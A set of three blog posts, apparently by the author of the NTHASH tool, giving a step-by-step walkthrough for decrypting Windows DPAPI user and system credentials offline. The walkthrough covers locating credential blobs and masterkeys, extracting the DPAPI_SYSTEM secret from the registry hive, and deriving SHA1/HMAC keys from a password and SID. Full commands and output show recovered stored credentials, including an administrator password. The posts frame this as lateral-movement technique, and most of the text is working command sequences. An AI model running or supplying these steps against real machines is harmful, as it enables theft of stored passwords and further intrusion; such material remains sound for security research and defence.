Déc 312019
 

In previous article, we have decrypted user blob/credentials.
This time lets decrypt system credentials.

5 steps:
-look at the encrypted blob/credential
-look at the encrypted masterkey
-retrieve dpapi system key used
-decrypt the encrypted masterkey
-decrypt the encrypted blob/credential
-conclusion

1/look at the encrypted blob/credential

System credentials are located here:
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

nthash-win64 /decodeblob
/binary:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

->note the dwFlags:20000000 = system

2/look at the encrypted masterkey

Masterkeys are located here:
C:\Windows\System32\Microsoft\Protect

NTHASH-win64.exe /decodemk
/binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\085027a7-b332-4d46-b9d1-743b668d378d

3/retrieve dpapi system key used

Because we are dealing with system blobs/credentials, and because « system » is not a user, we wont be fetching the sha1 password.
Rather, we will be using the dpapi system key to decrypt the masterkey.
Because we do this offline, you need the security.sav hive in the same folder as nthash.

NTHASH-win64.exe /dumpsecret /input:dpapi_system /offline
NTHASH 1.7 x64 by erwan2212@gmail.com

Offline=true
Full:XX3CA961B1DCEB7DF0XXB359D981C1A3EB1D472FXX398A7D34786F8D5FXX52F318A4EDFFAF0
2F7XX
Machine:XX3CA961B1DCEB7DF0XXB359D981C1A3EB1D472F
User:xx398A7D34786F8D5FXX52F318A4EDFFAF02F7XX

4/decrypt the encrypted masterkey

NTHASH-win64.exe /decodemk
/binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\085027a7-b332-4d46-b9d1-743b668d378d
/input:8B398A7D34786F8D5FXX52F318A4EDFFAF02F7XX

**** Unprotecting MasterKey ****
KEY:4136467C1A3CC9C4BB0495BF639ED57269D10E47A333D6C8E21855E39B697FA1DAEB27EE2B80
0CD79362676D5AB79073EC642ADA0FB4E732B82E817812E75C26
SHA1:XX9042755B4CA2XX55FFB1F41CEDE6CD17116FXX

5/decrypt the encrypted blob/credential

nthash-win64 /decodeblob
/binary:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /input:XX9042755B4CA2XX55FFB1F41CEDE6CD17116FXX

**** Decoding Cred Blob ****
credFlags:48
credSize:3170
Type:1
Flags:0
LastWritten:31/10/2019 16:56:52
TargetName:WindowsLive:target=virtualapp/didlogical
unkdata:
comment:PersistedCredential
targetalias:
username:somerandomuser
CredentialBlob:somerandomblob

6/Conclusion?

Retrieving the dpapi system is even more trivial compared to retrieving the user password (cleartext or sha1) as it is stored in the registry.
All you need is the blob, the associated masterkey and the dpapi system key stored in the registry.

Déc 302019
 

Lets decrypt a user credentials (which happen to be enctyped in dpapi blobs).

5 steps:
-look at the encrypted blob/credential
-look at the encrypted masterkey
-retrieve the sha1 user password and compute the sha1-hmac key
-decrypt the encrypted masterkey
-decrypt the encrypted blob/credential
-conclusion

1/look at the encrypted blob/credential

User credentials are located here:
C:\Users\username\AppData\Roaming\Microsoft\Credentials
C:\Users\username\AppData\Local\Microsoft\Credentials

NTHASH-win64.exe /decodeblob
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Credentials\444F0F078CB16849842B0928EF18C7E1

->note the dwFlags:0 = user
We can see it is using masterkey ae222549-867a-4269-b29f-49500e8842c8.

2/look at the encrypted masterkey

Masterkeys are located here:
C:\Users\username\AppData\Roaming\Microsoft\Protect\sid

NTHASH-win64.exe /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8

3/retrieve the sha1 user password and compute the sha1-hmac key

To decrypt this masterkey, you either know the cleartext password or you know its SHA1 form (retrieved thru some other lateral movements).

If you know the cleartext password, then lets computer its SHA1.
Skip the below if you already have the SHA1 password.

NTHASH-win64.exe /widestringtohexa /input:Password12345
NTHASH 1.7 x64 by erwan2212@gmail.com

widestringtobyte
500061007300730077006F007200640031003200330034003500

NTHASH-win64.exe /gethash /mode:SHA1 /input:5500061007300730077006F007200640031003200330034003500
NTHASH 1.7 x64 by erwan2212@gmail.com
gethash
0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0

Note that you can run the 2 previous commands in one go :
NTHASH-win64.exe /widestringtohexa /input:Password12345 | NTHASH-win64.exe /gethash /mode:SHA1

Now, lets compute the sha1-hmac key to decrypt the masterkey.
For this we need the SHA1 password + user sid.

NTHASH-win64.exe /widestringtohexa /input:S-1-5-21-2427513087-2265021005-1965656450-1001
NTHASH 1.7 x64 by erwan2212@gmail.com
widestringtobyte
53002D0031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003200360035003000320031003000300035002D0031003900360035003600350036003400350030002D003100300030003100

Lets not forget to add 0000 for null widechar terminated string.

NTHASH-win64.exe /gethmac /mode:SHA1 /key:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0
/input:530020031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003
00360035003000320031003000300035002D0031003900360035003600350036003400350030002
0031003000300031000000

NTHASH 1.7 x64 by erwan2212@gmail.com
gethmac
262FA2EFDE8F5C9F525DAD764B6710D663BA5DA5

4/decrypt the encrypted masterkey

NTHASH-win64.exe /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8
/input:262FA2EFDE8F5C9F525DAD764B6710D663BA5DA5

NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting Blob ****
KEY:83D3D812E50FAB6F83DA070D6C566DCFE3248A1AD873AA1D222F6B41342890EEBD790388FE2A
21680A081723AA0C7B39EFBA5B16BB5D948B947140838F1F5383
SHA1:38920930CFB2A1CE61F9CB52153025535F548F53

5/decrypt the encrypted blob/credential

nthash-win64 /decodeblob
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Credentials\444F0F078CB16849842B0928EF18C7E1
/input:38920930CFB2A1CE61F9CB52153025535F548F53

NTHASH 1.7 x64 by erwan2212@gmail.com
**** Decoding Cred Blob ****
credFlags:48
credSize:194
Type:2
Flags:0
LastWritten:15/12/2019 19:16:09
TargetName:Domain:target=192.168.1.188
unkdata:
comment:SspiPfc
targetalias:
username:ERWAN-PC2\administrateur
CredentialBlob:weakpassword

6/Conclusion ?

You dont need to be online or run as the user to retrieve secrets :
If you own a blob, its associated masterkey and the cleartext password OR the sha1 password, you can decrypt these offline.

Déc 302019
 

In previous articles about lateral movement, we have mostly used « live » scenarios where we would either run as the victim user or we would dump secrets from (lsass) memory.

This time, lets look at dpapi secrets in « offline » scenarios.

About DPAPI, see wikipedia.

DPAPI (Data Protection Application Programming Interface) is a simple cryptographic application programming interface available as a built-in component in Windows 2000 and later versions of Microsoft Windows operating systems. In theory the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

DPAPI secrets are made of :
-a blob containing encrypted data, linked to a masterkey (used to decrypt the blob)
-a masterkey containing one (or several) encrypted key(s)

To decrypt a masterkey (and therefore a blob), you need the below:
-non-domain context: SID AND user password (when the masterkey was created) SHA1 hash
-domain context: SID AND user password (when the masterkey was created) NTLM hash
-local computer: DPAPI_SYSTEM secret (COMPUTER or USER part)

In the next 3 (+1) articles, we will see how to decrypt dpapi secrets.

Before doing so, I recommend reading this article.

Also, most part of the knowledge and coding is greatly (understatement here) inspired by the excellent work (another understatement) from Gentilwiki and Mimikatz.